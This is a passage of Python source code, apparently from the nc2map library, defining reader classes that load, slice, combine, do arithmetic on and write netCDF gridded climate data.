indices = np.searchsorted(self.level[:], reader.level[:],
side='right',
sorter=np.argsort(self.level[:]))
indices = len(self.level) - indices
else:
indices = np.searchsorted(self.level[:], reader.level[:])
for var, obj in self.variables.items():
if slevel not in _get_dims(obj):
continue
data[var]['data'] = np.insert(
data[var]['data'], indices, obj[:],
axis=list(_get_dims(obj)).index(reader.levelnames))
return ArrayReader(
meta=self.get_meta().copy(),
timenames=self._timenames, levelnames=self._levelnames,
lonnames=self._lonnames, latnames=self._latnames, **data)
def dump_nc(self, output, clobber=False, compression={}, close=True,
missval=None, **kwargs):
"""Method to create netCDF file out the data in the ArrayReader
Input:
- output: String. Name of the resulting NetCDF file
- clobber: Enable clobber (will significantly reduce file size).
Input must be 'auto' or a list of the chunking parameters (the
first one corresponds to time, the others to the dimension as
stored in the netCDF file (usually the second corresponds to
lat, the third to lon).
If 'auto' chunking parameters are deterimined such that 1D and
2D access are balanced. The calculation function is taken from
http://www.unidata.ucar.edu/staff/russ/public/chunk_shape_3D.py
- Dictionary with compression parameters for netCDF4 variable
(determined by netCDF4 package. Possible keywords are zlib,
complevel, shuffle and least_significant_digit. For documentation
see
http://netcdf4-python.googlecode.com/svn/trunk/docs/netCDF4.Variable-class.html
If compression is not a dictionary, the value will be used for
the complevel keyword in netCDF4 variables.
- close: True/False. If True, the NetCDF handler will be closed at
the end
- missval: Missing Value. If None, it will be looked for a
_FillValue attribute in the reader or the FillValue of the
masked numpy array will be used.
Returns:
- nco. netCDF4.Dataset file handler of output
"""
# docstring is extended below
# set chunking parameter
if os.path.exists(output):
os.remove(output)
self.logger.debug("Creating NetCDF file %s with..." % output)
self.logger.debug(" clobber: %s", clobber)
for item in kwargs.items():
self.logger.debug(" %s: %s", *item)
if clobber is not False:
if clobber == 'auto':
clobber = chunk_shape_3D(
[self.ntimes] + list(
self.lola_variables.values()[0].shape))
nco = NCReader(output, 'w', clobber=True, **kwargs)
else:
nco = NCReader(output, 'w', **kwargs)
if not isinstance(compression, dict):
compression = {'zlib': True, 'complevel': compression}
nco.setncatts(self.get_meta())
created_dims = set()
for var, obj in self.variables.items():
self.logger.debug("Creating variable %s" % var)
if missval is None:
try:
fill_value = obj._FillValue
except AttributeError:
try:
fill_value = obj[:].fill_value
except AttributeError:
fill_value = None
else:
fill_value = missval
for i, dim in enumerate(_get_dims(obj)):
if dim not in created_dims:
if dim == self.timenames:
nco.createDimension(dim, None)
else:
nco.createDimension(dim, obj.shape[i])
created_dims.add(dim)
if clobber is not False:
varno = nco.createVariable(
var, obj[:].dtype, _get_dims(obj),
chunksizes=clobber, fill_value=fill_value, **compression
)
else:
varno = nco.createVariable(
var, obj[:].dtype, _get_dims(obj),
fill_value=fill_value, **compression
)
varno.setncatts(self.get_meta(var=var))
varno[:] = obj[:]
if close:
nco.close()
return nco
def get_data(self, var=None, vlst=None, datashape='2D', convert_time=True,
rename_dims=True, convert_spatial=True, **dims):
"""Extract data out of the ArrayReader instance
Please note that either var or vlst must be None
Input:
- var: string. Variable name to extract
- vlst: List of strings. Variable names to extract. If this is not
None, the fist dimension of the Data output will be set up as
vlst
- datashape: string ('1d', '2d', '3d', '4d' or 'any'). Data shape
which shall be returned.
-- If 1d, output will be a one-dimensional array. Different from
'2d', '3d' and '4d', you must give all dimensions
explicitly, there are no default values
-- If 2d, output will be a two-dimensional array
with latitude and longitude dimension (if time and level is
not given, the according slices are 0)
-- If 3d, output will be a three-dimensional array with time,
latitude and longitude dimension. (if level dimensions is
not given, the according slice will 0)
-- If 4d: output will be a four-dimensional array with time,
level, latitude and longitude dimension.
-- If any: dimensions will be unchanged and the full
slice is returned for dimensions not specified in **dims
In the case of 2d, 3d or 4d, an error is raised if a dimension
is found which is not in self.timenames, self.levelnames,
self.lonnames or self.latnames and not specified by **dims
- convert_time: Boolean (Default: True). If this is true, the time
informations are converted to datetime.datetime instances
- convert_spatial: Boolean (Default: True). If this is True, and the
spatial dimensions (latitudes, longitudes) are in radians, they
are converted to degrees
Further Keyword arguments (**dims) may be of
<dimension name>=<dimension slice>, where <dimension name> is the
name of the dimension as stored in the variable instance and
<dimension slice> the slice (or integer) which shall be extracted.
If the dimension furthermore is a time dimensions, the index can
in a numpy.datetime64 compatible style (e.g. '2005-03', see
get_time_slice method)
"""
def extract_data(var, dimslices):
self.logger.debug("Extract %s", var)
# read data
self.logger.debug("Extract data with slice %s", dimslices)
data = self.variables[var].__getitem__(tuple(dimslices))
if not isinstance(data, np.ma.MaskedArray):
self.logger.debug("Convert %s to masked array", type(data))
data = np.ma.masked_array(
data, mask=np.ma.make_mask(np.zeros(shape=np.shape(data)),
shrink=False), copy=True)
# set up grid information for DataField instance
vardims = list(_get_dims(self.variables[var]))
# check whether data has the right shape
if udim: # unstructered has only one spatial dimension
shapelens = {'1d': 1, '2d': 1, '3d': 2, '4d': 3}
else:
shapelens = {'1d': 1, '2d': 2, '3d': 3, '4d': 4}
for shapelen, val in shapelens.items():
if datashape == shapelen and len(data.shape) != val:
raise ValueError((
"Wrong dimension length! Expected %i dimensions but "
"found %i in %s. Set datashape to 'any' to return "
"all.") % (val, len(data.shape), vardims))
# remove integer slices
for key, val in dims.items():
if isinstance(val, int) and key in vardims:
self.logger.debug(
"Remove dimension %s from dimension list because "
"integer slice.", key)
vardims.remove(key)
return data, vardims
self.logger.debug("Getting data with var %s and vlst %s", var, vlst)
# set up dimension order to read from the netCDF
if var is not None and var not in self.variables.keys():
raise KeyError(
'Unknown variable %s! Possible variables are %s' % (
var, self.variables.keys()))
if vlst is not None and any(
var not in self.variables.keys() for var in vlst):
missing_vars = ', '.join(
str(var) for var in vlst if var not in self.variables.keys())
raise KeyError(
'Unknown variables %s! Possible variables are %s' % (
missing_vars, self.variables.keys()))
if var is not None and vlst is not None:
raise ValueError(
"Either var or vlst keyword must be None!")
if var is None and vlst is None:
raise ValueError("Either var or vlst must not be None!")
single_var = True if var is not None else False
multiple_vars = True if np.all(vlst is not None) else False
self.logger.debug("Desired datashape: %s", datashape)
for key, val in dims.items():
self.logger.debug("Slice for dimension %s: %s", key, val)
if var is not None:
dimslices = list(_get_dims(self.variables[var]))
elif np.all(vlst is not None):
var = vlst[0]
dimslices = list(_get_dims(self.variables[var]))
else:
dimslices = [self.timenames, self.levelnames, self.lonnames,
self.latnames]
self.logger.debug("Dimensions in variable instance: %s",
', '.join(dimslices))
default_slices = {}
datashape_slices = {
'2d': {'time': 0, 'level': 0},
'3d': {'time': slice(None), 'level': 0}}
for dshape in ['1d', '4d', 'any']:
datashape_slices[dshape] = {
'time': slice(None), 'level': slice(None)}
for val in datashape_slices.values():
val['lon'] = slice(None)
val['lat'] = slice(None)
datashape = datashape.lower()
if not datashape in datashape_slices:
raise ValueError(
"Wrong datashape %s! Possible values are %s" % (
', '.join(datashape_slices)))
varo = self.variables[var]
udim = self._udim(varo)
for i, dim in enumerate(dimslices):
try:
self.logger.debug(
"Try to get slice for dimension %s from user settings",
dim)
if dim == self.timenames:
dimslices[i] = self.get_time_slice(dims[dim])
dims[dim] = dimslices[i]
else:
dimslices[i] = dims[dim]
except KeyError:
self.logger.debug("Failed.")
# if dimension has length 1: take first entry
for sdim in ['lon', 'lat', 'time', 'level']:
failed = True
possible_names = getattr(self, '_'+sdim+'names')
if dim in possible_names:
for d in possible_names:
try:
dimslice = dims[d]
dims[dim] = dims.pop(d)
except KeyError:
dimslice = datashape_slices[datashape][
sdim]
self.logger.debug(
"Found dimension %s in standard names for %s "
"--> use slice %s", dim, sdim, dimslice)
if varo.shape[i] == 1 and datashape == '1d':
dimslices[i] = 0
dims[dim] = dimslices[i]
else:
dimslices[i] = dimslice
dims[dim] = dimslices[i]
failed = False
break
if failed and varo.shape[i] == 1:
self.logger.debug(
"Dimension %s was not specified but has length 1 --> "
"use first step" % dim)
if datashape == 'any':
dimslices[i] = slice(None)
dims[dim] = slice(None)
else:
dimslices[i] = 0
dims[dim] = 0
elif failed and dim == udim:
dimslices[i] = slice(None)
dims[dim] = slice(None)
elif failed and datashape in ['1d', 'any']:
if dim != udim:
warn("Dimension %s was not specified, therefore I "
"return all of that dimension" % dimslices[i])
dimslices[i] = slice(None)
dims[dim] = slice(None)
elif failed:
self.logger.info(
"Use the first step for dimension %s. ", dim)
dimslices[i] = 0
dims[dim] = 0
unused_dimensions = [dim for dim in dims if not dim in _get_dims(varo)]
if unused_dimensions:
if set(unused_dimensions) - {'time', 'level'}:
warn("Did not use slice for dimension %s because not in "
"dimension list of variable %s!" % (
', '.join(unused_dimensions), _get_dims(varo)))
else:
self.logger.debug(
"Did not use slice for dimension %s because not in "
"dimension list of variable %s!",
', '.join(unused_dimensions), _get_dims(varo))
#for dim in unused_dimensions:
#del dims[dim]
datakwargs = {}
standard_names = {'lon': self._lonnames, 'lat': self._latnames,
'time': self._timenames, 'level': self._levelnames}
for dim, dimslice in dims.items():
self.logger.debug("Try to get data for dimension %s", dim)
try:
dim_data = self.variables[dim]
except KeyError:
exist = False
for key, val in standard_names.items():
if dim in val:
try:
dim_data = self.variables[
getattr(self, key+'names')]
exist = True
break
except KeyError:
pass
if not exist and dim != udim:
warn("Did not find data for dimension %s in the reader" % (
dim))
if not exist:
continue
if dim in self._timenames and convert_time:
try:
dim_data = self.convert_time(dim_data, dim)
except ValueError as e:
warn(e.message, logger=self.logger)
elif (dim in self._lonnames.union(self._latnames)
and convert_spatial):
dim_data = self.convert_spatial(dim_data, raise_error=False,
vname=dim)
datakwargs[dim] = dim_data[dimslice]
# consider unstructured data
if udim:
lon, lat, triangles = self.get_triangles(varo, convert_spatial)
if self._lonnames.isdisjoint(datakwargs):
datakwargs[self.lonnames or 'lon'] = lon
if self._latnames.isdisjoint(datakwargs):
datakwargs[self.latnames or 'lat'] = lat
datakwargs['triangles'] = triangles
# add unstructured dimension to datakwargs
if self.udims.isdisjoint(datakwargs):
iax = list(_get_dims(varo)).index(udim)
datakwargs[udim] = np.array(range(varo.shape[iax]))
if single_var:
varname = var
data, vardims = extract_data(var, dimslices)
dims['var'] = var
elif multiple_vars:
varname = '-'.join(vlst)
data0, vardims = extract_data(vlst[0], dimslices)
data = np.ma.zeros([len(vlst)] + list(np.shape(data0)))
data[0, :] = data0
del data0
for i, var in enumerate(vlst[1:]):
data0, vardims0 = extract_data(var, dimslices)
if not np.all(vardims == vardims0):
raise ValueError(
"Dimensions do not match! Found dimensions %s for "
"variable %s and dimensions %s for variable %s." % (
vardims, vlst[0], vardims0, var))
data[i+1, :] = data0
vardims.insert(0, varname)
# avoid a warning in from the DataField.check_dims method
datakwargs[varname] = range(len(vlst))
dims['vlst'] = vlst
# get spatial axis
if udim:
spatial_ax = [list(vardims).index(udim)]
else:
spatial_ax = [i for i, dim in enumerate(vardims)
if dim in self._lonnames.union(self._latnames)]
# rename dimensions lon, lat, time and level
if rename_dims:
for i, dim in enumerate(vardims):
for key, val in standard_names.items():
if dim in val:
vardims[i] = key
for dim in datakwargs:
for key, val in standard_names.items():
if dim in val.intersection(datakwargs):
datakwargs[key] = datakwargs.pop(dim)
kwargs = {}
else:
non_standard_names = {'lon': self.lonnames, 'lat': self.latnames,
'time': self.timenames,
'level': self.levelnames}
for key in datakwargs:
if key in non_standard_names:
datakwargs[non_standard_names[key]] = datakwargs.pop(key)
kwargs = {'lon': self.lonnames, 'lat': self.latnames,
'time': self.timenames, 'level': self.levelnames}
if datashape in ['any', '1d']:
return DataField(data, var=varname, dimensions=vardims,
dims=datakwargs, spatial_ax=spatial_ax,
triangles=datakwargs.pop('triangles', None),
**kwargs)
else:
# set up dimensions according to the conventions used in nc2map
spatial = [udim] if udim else ['lat', 'lon']
if single_var:
conventions = {'2d': spatial,
'3d': ['time'] + spatial,
'4d': ['time', 'level'] + spatial}
elif multiple_vars:
conventions = {'2d': [varname] + spatial,
'3d': [varname, 'time'] + spatial,
'4d': [varname, 'time', 'level'] + spatial}
vardims = [dim for dim in vardims if dim in conventions[datashape]]
for dim in vardims:
if vardims.index(dim) != conventions[datashape].index(dim):
data = np.rollaxis(data, vardims.index(dim),
conventions[datashape].index(dim))
vardims.remove(dim)
vardims.insert(conventions[datashape].index(dim), dim)
return DataField(data, var=varname, dims=datakwargs,
dimensions=conventions[datashape],
spatial_ax=spatial_ax,
triangles=datakwargs.pop('triangles', None),
**kwargs)
def gen_data(self, var, datashape='2d', **dims):
"""This method returns a data generator for a 2-dimensional data slice
for the given dimensions dims.
Any dimension being an 1-dimensional iterable object (list,
numpy.array) specifies over which dimension it will be looped.
In this case a generator for dummy 2-dimensional arrays is returned"""
iterable_dims = []
for key, val in dims.items():
try:
iter(val)
iterable_dims.append(key)
except TypeError:
pass
if len(iterable_dims) == 0:
warn('Did not find any interable dimension!')
elif len(iterable_dims) > 1:
raise ValueError('Found multiple iterable dimensions!')
iterable_dim = iterable_dims[0]
it_vals = iter(dims[iterable_dim])
next_val = True
while next_val:
try:
dims.update({iterable_dim: next(it_vals)})
yield self.get_data(var=var, datashape=datashape, **dims)
except:
next_val = False
def set_meta(self, var=None, **meta):
"""Set meta information.
Input:
- var: string. Variable name. If None, the meta information is
regarded as global meta information
Keyword arguments (meta) describe the key, value pairs for the
meta informations"""
if var is not None and var not in self.variables.keys():
raise KeyError('Unknown variable %s' % var)
if var is None:
obj = self
else:
obj = self.variables[var]
obj.meta.update(meta)
def get_meta(self, var=None):
"""Get meta information.
Input:
- var: string. Variable name. If None, the meta information is
regarded as global meta information"""
possible_keys = self.variables.keys() + list(self._timenames) + list(
self._levelnames) + list(self._lonnames) + list(self._latnames)
if var is not None and var not in possible_keys:
raise KeyError('Unknown variable %s' % var)
if var is None:
obj = self
elif var in self._lonnames:
obj = self.lon
elif var in self._latnames:
obj = self.lat
elif var in self._timenames:
obj = self.time
elif var in self._levelnames:
obj = self.level
else:
obj = self.variables[var]
return obj.meta
def copy(self):
"""Returns an ArrayReader instance with the same attributes as this
ArrayReader instance"""
data = {}
for var, obj in self.variables.items():
data[var] = {'data': obj[:].copy(), 'dims': _get_dims(obj)[:],
'meta': self.get_meta(var=var).copy()}
reader = ArrayReader(
meta=self.get_meta().copy(),
timenames=self._timenames, levelnames=self._levelnames,
lonnames=self._lonnames, latnames=self._latnames, **data)
try:
reader._grid_file = self._grid_file
except AttributeError:
pass
return reader
def close(self):
"""Closes the ArrayReader instance and deletes the stored variables"""
for variable in self.variables:
try:
del variable.data
except AttributeError:
pass
del self.variables[variable]
def selname(self, *args, **kwargs):
"""Method to return an ArrayReader instance with only the grid
variables
Keyword arguments may be
- copy: Boolean. (Default: False). If True, the data will sign to
the same array as before. Otherwise everything will be copied."""
copy = kwargs.get('copy')
data = {}
var_items = [
item for item in self.variables.items() if item[0] in args]
dimensions = set(chain(*[self.get_coords(obj)
for var, obj in var_items]))
dim_items = [
item for item in self.variables.items() if item[0] in dimensions]
for var, obj in var_items + dim_items:
if copy:
data[var] = {'data': obj[:].copy(), 'dims': _get_dims(obj)[:],
'meta': self.get_meta(var=var).copy()}
else:
data[var] = {'data': obj[:], 'dims': _get_dims(obj)[:],
'meta': self.get_meta(var=var)}
if copy:
meta = self.get_meta().copy()
else:
meta = self.get_meta()
return ArrayReader(
meta=meta,
timenames=self._timenames, levelnames=self._levelnames,
lonnames=self._lonnames, latnames=self._latnames, **data)
def expand_dims(self, var=None, vlst=None, default=0, **dims):
"""Expands the dimensions to match the dimensions in the reader
variable"""
# dimensions in the variable (without longitude and latitude)
if var is None:
dims['vlst'] = vlst
var = self.variables[vlst[0]]
else:
dims['var'] = var
var = self.variables[var]
vdims = set(_get_dims(var)) - self._latnames - self._lonnames \
- self.udims
ndims = len(set(dims) & self._levelnames & self._timenames &
set(_get_dims(var)))
if ndims == len(vdims):
return dims
# standard names from reader._levelnames, etc.
levelnames = self._levelnames
timenames = self._timenames
vdims -= set(dims) # remove dims that match already
if not levelnames.isdisjoint(dims):
vdims -= levelnames
if not timenames.isdisjoint(dims):
vdims -= timenames
for dim in vdims:
if (dim == self.levelnames and 'level' in levelnames):
dim = 'level'
elif (dim == self.timenames and 'time' in timenames):
dim = 'time'
self.logger.info("Use %s for dimension %s. ", default, dim)
dims[dim] = default
return dims
def extract(self, var=None, vlst=None, **kwargs):
"""Method to extract the data variable specified by **dims and returns
an ArrayReader instance with only this data plus the grid
informations. This method will return a new copy of the ArrayReader
instance
Keyword arguments (kwargs) are determined by the get_data method, where
datashape is by default set to 'any' and convert_time to False.
"""
kwargs.setdefault('datashape', 'any')
kwargs.setdefault('convert_time', False)
for key, val in kwargs.items():
if isinstance(val, int) and key not in [
'datashape', 'convert_time']:
kwargs[key] = slice(val, val+1)
elif key in self._timenames:
val = self.get_time_slice(val)
if isinstance(val, int):
kwargs[key] = slice(val, val+1)
else:
kwargs[key] = val
if var is not None:
vlst = [var]
full_vlst = set(vlst + list(chain(*(
_get_dims(self.variables[var]) for var in vlst)))).intersection(
set(self.variables.keys()))
reader = self.selname(*full_vlst, copy=True)
data = reader.get_data(rename_dims=False, var=var,
vlst=vlst if var is None else None, **kwargs)
for dim in data.dims.dtype.fields:
try:
reader.variables[dim].data = data.dims[dim].copy()
except KeyError:
pass
if var is not None:
reader.variables[var].data = data[:].copy()
reader.variables[var].dimensions = data.dimensions[:]
else:
for i, var in enumerate(vlst):
reader.variables[var].data = data[i, :].copy()
reader.variables[var].dimensions = data.dimensions[1:]
return reader
def _arithmetics(self, value, func):
"""Basic function performing arithmetics with readers. Value may be a
another ArrayReader instance, func is the function that defines the
arithmetics method (e.g. lambda x, y: x + y)
This method is called by __iadd__, __imulc__, etc."""
def check_reader(reader):
"""Checks whether the reader dimensions and variables match to this
one and prints warnings and raises errors
Input:
- reader: ArrayReader instance
Output:
- dictionary with matches"""
checks = self._check_variables(reader)
checks.update(checks['base']._check_dims(checks['new']))
return checks
try: # try first simply to add the value or array to each variable
for var in set(self.variables) - set(self.grid_variables):
obj = self.variables[var]
try: # try __getitem__ (in case of array)
func(obj, slice(None), value[:])
except TypeError: # try float
func(obj, slice(None), value)
base = self
except TypeError: # now assume a reader instance
checks = check_reader(value)
if not checks['base']:
return self
dims = ['level', 'time']
base = checks['base']
new = checks['new']
if all(checks[dim] for dim in dims):
for base_var, new_var in izip(checks['base_vars'],
checks['new_vars']):
func(base.variables[base_var], slice(None),
new.variables[new_var][:])
else:
for base_var, new_var in izip(checks['base_vars'],
checks['new_vars']):
dimslices = ['base_', 'new_']
dims_gen = product(
izip(checks['base_time'], checks['new_time']),
izip(checks['base_level'], checks['new_level']))
for times, levels in dims_gen:
for i, var in enumerate([base.variables[base_var],
new.variables[new_var]]):
obj = base if not i else new
vardims = np.array(_get_dims(var))
dimslices[i] = list(_get_dims(var))
for j, dim in enumerate(dimslices[i]):
if dim == obj.timenames:
dimslices[i][j] = times[i]
elif dim == obj.levelnames:
dimslices[i][j] = levels[i]
else:
dimslices[i][j] = slice(None)
func(
base.variables[base_var], tuple(dimslices[0]),
new.variables[new_var].__getitem__(tuple(
dimslices[1])))
return base
def _check_dims(self, reader):
"""Checks whether the reader dimensions match to this one and
prints warnings and raises errors
Method is used by _arithmetics to determine how to perform
arithmetics between readers
Input:
- reader: ArrayReader instance
Output:
- dictionary with matches"""
# ---- check grid sizes ----
if (np.all(self.lon[:] != reader.lon[:])
or np.all(self.lat[:] != reader.lat[:])):
# raise warning if lens match anyway
if all(len(getattr(reader, dim)) == len(getattr(self, dim))
for dim in ['lat', 'lon']):
critical(
"Attention! Only grid size of %s matches!" % type(
reader))
else:
raise ValueError(
"Grid of %s does not match!" % type(reader))
# ---- check dimensions ----
checks = {}
for dim in ['level', 'time']:
my_dim = getattr(self, dim)
rd_dim = getattr(reader, dim)
if my_dim is None or rd_dim is None:
self.logger.debug("%s in self is None: %s", dim,
my_dim is None)
self.logger.debug("%s in reader is None: %s", dim,
rd_dim is None)
if my_dim is None and rd_dim is None:
self.logger.debug(" --> both None")
checks[dim] = True
else:
checks[dim] = False
checks['base_'+dim] = cycle([None]) if my_dim is None \
else xrange(len(my_dim))
checks['new_'+dim] = cycle([None]) if rd_dim is None \
else xrange(len(rd_dim))
elif len(my_dim) == len(rd_dim):
self.logger.debug(
"Dimension size for %s is the same (%i)", dim,
len(my_dim))
if not np.all(my_dim[:] == rd_dim[:]):
warn("%s informations are not the same!" % dim)
checks[dim] = True
checks['base_'+dim] = [slice(None)]
checks['new_'+dim] = [slice(None)]
elif len(my_dim) == 1 or len(rd_dim) == 1:
self.logger.debug(
"%s size in self: %i", dim, len(my_dim))
self.logger.debug(
"%s size in reader: %i", dim, len(rd_dim))
checks[dim] = False
if len(my_dim) == 1:
checks['base_'+dim] = cycle([0])
checks['new_'+dim] = xrange(len(rd_dim))
else:
checks['base_'+dim] = xrange(len(my_dim))
checks['new_'+dim] = cycle([0])
else:
raise ValueError(
"%s dimensions do not match!" % dim)
return checks
def _check_variables(self, reader):
"""Function to check if variables match
Method is used by _arithmetics to determine how to perform
arithmetics between readers
"""
checks = {}
# ---- check variables ----
my_var_keys = sorted(set(self.variables) - set(self.grid_variables))
rd_var_keys = sorted(
set(reader.variables) - set(reader.grid_variables))
my_nvars = len(my_var_keys)
rd_nvars = len(rd_var_keys)
# if no lola_variables in value: return
if not my_nvars or not rd_nvars:
if not rd_nvars:
warn("Found no longitude-latitude variables in %s!" % (
type(reader)))
if not my_nvars:
warn("Found no longitude-latitude variables in self!")
checks['base'] = False
# if both have same lenghts --> calculate
elif my_nvars == rd_nvars:
self.logger.debug("Found same number of variables: %i",
my_nvars)
# check if variable definitions match
if (not (my_nvars == 1 and rd_nvars == 1)
and not np.all(my_var_keys == rd_var_keys)):
raise ValueError(
"Variables of the first reader (%s) do not match "
"to those of the second (%s)!" % (
', '.join(my_var_keys), ', '.join(rd_var_keys)))
checks['base'] = self
checks['new'] = reader
checks['base_vars'] = my_var_keys
checks['new_vars'] = rd_var_keys
# if one has length 1 --> fill up stream
elif my_nvars == 1 or rd_nvars == 1:
self.logger.debug("Number of variables in %s: %i",
type(reader), rd_nvars)
self.logger.debug("Number of variables in self: %i", my_nvars)
if my_nvars == 1:
checks['base'] = reader
checks['new'] = self
self.logger.debug(" --> Filling up self")
checks['base_vars'] = rd_var_keys
checks['new_vars'] = cycle(my_var_keys)
else:
checks['base'] = self
checks['new'] = reader
self.logger.debug(" --> Filling up %s" % type(reader))
checks['base_vars'] = my_var_keys
checks['new_vars'] = cycle(rd_var_keys)
return checks
def __enter__(self):
return self
def __exit__(self, type, value, tb):
self.close()
def __iadd__(self, value):
"""Self agglomeration method of ArrayReader class"""
def _iadd(v, s, y):
v[s] += y
return v
return self._arithmetics(value, _iadd)
def __add__(self, value):
"""Agglomeration method of ArrayReader class"""
reader = self.copy()
reader += value
return reader
def __imul__(self, value):
"""Self multiplication method of ArrayReader class"""
def _imul(v, s, y):
v[s] *= y
return v
return self._arithmetics(value, _imul)
def __mul__(self, value):
"""Multiplication method of ArrayReader class"""
reader = self.copy()
reader *= value
return reader
def __idiv__(self, value):
"""Self division method of ArrayReader class"""
def _idiv(v, s, y):
v[s] /= y
return v
return self._arithmetics(value, _idiv)
def __div__(self, value):
"""Division method of ArrayReader class"""
reader = self.copy()
reader /= value
return reader
def __isub__(self, value):
"""Self subtraction method of ArrayReader class"""
def _isub(v, s, y):
v[s] -= y
return v
return self._arithmetics(value, _isub)
def __sub__(self, value):
"""Subtraction method of ArrayReader class"""
reader = self.copy()
reader -= value
return reader
def __ipow__(self, value):
"""Self power method of ArrayReader class"""
def _ipow(v, s, y):
v[s] **= y
return v
return self._arithmetics(value, _ipow)
def __pow__(self, value):
"""Subtraction method of ArrayReader class"""
reader = self.copy()
reader **= value
return reader
def __abs__(self):
reader = self.copy()
for varo in reader.variables.values():
varo[:] = abs(varo[:])
return reader
def __str__(self):
strings = [super(ReaderBase, self).__repr__()]
for item in self.get_meta().items():
strings.append(" %s: %s" % item)
strings.append(" variables(dimensions): %s" % (
', '.join(
"%s %s(%s)" % (item[1][:].dtype, item[0],
', '.join(_get_dims(item[1])))
for item in self.variables.items())))
return '\n'.join(strings)
class ArrayReader(ReaderBase):
"""Enhanced ReaderBase with methods to rename and create Variables"""
def renameAttribute(self, oldname, newname):
"""Renames the meta attribute 'oldname' to 'newname'"""
try:
self.meta[newname] = self.meta.pop(oldname)
except KeyError:
raise KeyError(
"Variable %s does not exist in reader! Possible variables are "
"%s." % (oldname, ', '.join(self.meta)))
def renameVariable(self, oldname, newname):
"""Renames the variable 'oldname' to 'newname' (but not
corresponding dimension! Use the renameDimension method for that.)"""
try:
self.variables[newname] = self.variables.pop(oldname)
self.variables[newname].var = newname
except KeyError:
raise KeyError(
"Variable %s does not exist in reader! Possible variables are "
"%s." % (oldname, ', '.join(self.variables)))
def renameDimension(self, oldname, newname):
"""Renames the dimension 'oldname' to 'newname' (but not
corresponding variables! Use the renameVariable method for that.)"""
exist = False
for varo in self.variables.values():
if oldname in varo.dimensions:
exist = True
dims = list(var.dimensions)
dims.insert(dims.index(oldname), newname)
varo.dimensions = tuple(dims)
if not exist:
dims = set(chain(*(
varo.dimensions for varo in self.variables.values())))
warn("Dimension %s not found in reader! Possible dimensions are "
"%s" % (oldname, ', '.join(dims)))
def createVariable(self, data=None, var='var', dims=('time', 'lat', 'lon'),
meta={}, delete=False):
"""Creates a new nc2map.readers.Variable in this ArrayReader
Input:
- data: numpy array with data
- var: name of the variable
- dims: tuple of dimension names (length of dims must match to
length of data.ndim)
- meta: dictionary containing meta informations (e.g. long_name,
units, etc.)
- delete: True/False. If False and the variable name var is already
in use, a ValueError is raised.
Returns:
The created nc2map.readers.Variable instance
"""
if delete and var in self.variables:
raise ValueError("Variable %s already exists in the Reader!")
self.variables[var] = Variable(data=data, var=var, dims=dims,
meta=meta)
return self.variables[var]
def to_NCReader(self, *args, **kwargs):
"""Dumps the data in the ArrayReader instance into a NetCDF file,
returns the open handler (if not close=False is set) and closes this
ArrayReader instance.
*args and **kwargs are determined by the dump_nc method.
"""
kwargs.setdefault('close', False)
nco = self.dump_nc(*args, **kwargs)
self.close()
return nco
def __getattr__(self, attr):
try:
return self.meta[attr]
except KeyError:
raise AttributeError(
"'%s' object has no attribute '%s'" % (
self.__class__.__name__, attr))
def __dir__(self):
return dir(super(ArrayReader, self)) + self.meta.keys()
class NCReader(ReaderBase):
"""nc2map compatible netCDF4.Dataset class
The netCDF4.Dataset instance is stored in nco attribute.
For initialization see __init__ method"""
nco_base = nc.Dataset
def __init__(self, *args, **kwargs):
"""Initialization method of NCReader instance
Parameters
----------
*args
Determined by the netCDF4.Dataset class
**kwargs
Determined by the netCDF4.Dataset class (despite of the parameters
below)
Other Parameters
----------
timenames: set of strings
Dimension and variable names that shall be considered as time
dimension or variable
levelnames: set of strings
Dimension and variable names that shall be considered as level
dimension or variable
lonnames: set of strings
Dimension and variable names that shall be considered as longitude
dimension or variable
latnames: set of strings
Dimension and variable names that shall be considered as latitude
dimension or variable
udims: set of strings
Dimension names that indicates that the variable is defined on an
unstructured grid
ufuncs: list
list containing interpretation functions for unstructered grids
(see below). Default grid interpretation functions are for
the ugrid conventions of triangular grids and for the ICON grid.
See Also
--------
nc2map.readers.ReaderBase: Basic class for reader interpretation"""
# docstring is extended below
self.nco = None
self.set_logger()
self.logger.debug('Initialization arguments:')
for arg in args:
self.logger.debug(' %s', arg)
self.logger.debug('Initialization keyword arguments:')
for item in kwargs.items():
self.logger.debug(' %s: %s', *item)
# set timenames, levelnames, lonnames and latnames
dimnames = {'timenames', 'levelnames', 'lonnames', 'latnames'}
# convert from string to list
for key in dimnames:
if key in kwargs and isinstance(kwargs[key], str):
kwargs[key] = [kwargs[key]]
for key, val in defaultnames.items():
setattr(self, key, set(kwargs.get(key, val)))
self.ufuncs = kwargs.pop('ufuncs', ufuncs)
# delete timenames, levelnames, lonnames and latnames key from kwargs
kwargs = {key: val for key, val in kwargs.items()
if key not in dimnames}
# save args and kwargs for initialization
self._init_args = args[:]
self._init_kwargs = kwargs.copy()
# init netCDF.MFDataset
self.nco = self.nco_base(*args, **kwargs)
self._set_grid_file(*args, **kwargs)
def _set_grid_file(self, *args, **kwargs):
"""Sets the _grid_file from kwargs['filename'], kwargs['files'][0],
args[0] and self.filepath()"""
success = False
for key in ['filename', 'files', 'filename_or_obj']:
try:
self._grid_file = kwargs.pop(key)
success = True
break
except KeyError:
pass
if not success:
try:
self._grid_file = args[0]
except IndexError:
# use netCDF4.Dataset.filepath method
self._grid_file = self.filepath()
except ValueError:
warn("Could not get file name of grid file!")
self.logger.debug(exc_info=True)
return
try:
self._grid_file = glob.glob(self._grid_file)[0]
except TypeError:
self._grid_file = glob.glob(self._grid_file[0])[0]
except:
warn("Could not get file name of grid file!")
def to_ArrayReader(self):
"""Same as copy method but closes this instance as well"""
newreader = self.copy()
self.close()
return newreader
def set_meta(self, var=None, **meta):
"""Set meta information.
Input:
- var: string. Variable name. If None, the meta information is
regarded as global meta information
Keyword arguments (meta) describe the key, value pairs for the
meta informations"""
if var is not None and var not in self.variables.keys():
raise KeyError('Unknown variable %s' % var)
if var is None:
self.nco.setncatts(meta)
else:
self.nco.variables[var].setncatts(meta)
def get_meta(self, var=None):
"""Get meta information.
Input:
- var: string. Variable name. If None, the meta information is
regarded as global meta information"""
possible_keys = self.variables.keys() + list(self._timenames) + list(
self._levelnames) + list(self._lonnames) + list(self._latnames)
if var is not None and var not in possible_keys:
raise KeyError('Unknown variable %s' % var)
if var is None:
obj = self
elif var in self._lonnames:
obj = self.lon
elif var in self._latnames:
obj = self.lat
elif var in self._timenames:
obj = self.time
elif var in self._levelnames:
obj = self.level
else:
obj = self.variables[var]
return OrderedDict([(key, getattr(obj, key)) for key in obj.ncattrs()])
def close(self):
"""Close the NCReader instance"""
self.nco.close()
self.nco = None
def __dir__(self):
